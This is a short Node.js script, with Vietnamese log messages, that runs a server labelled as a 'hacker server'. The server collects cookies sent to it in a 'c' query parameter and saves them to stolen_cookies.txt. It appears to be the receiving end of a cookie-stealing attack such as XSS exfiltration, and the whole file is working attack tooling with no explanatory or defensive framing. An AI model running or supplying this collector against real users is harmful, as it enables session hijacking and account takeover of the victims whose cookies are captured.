const http = require('http');
const fs = require('fs');

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://${req.headers.host}`);
  const cookie = url.searchParams.get('c');

  if (cookie) {
    console.log('[+] Cookie bị đánh cắp:', cookie);
    fs.appendFileSync('stolen_cookies.txt', cookie + '\n');
  }

  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Cookie received');
});

server.listen(8000, () => {
  console.log('🚨 Server hacker đang nghe tại http://localhost:8000');
});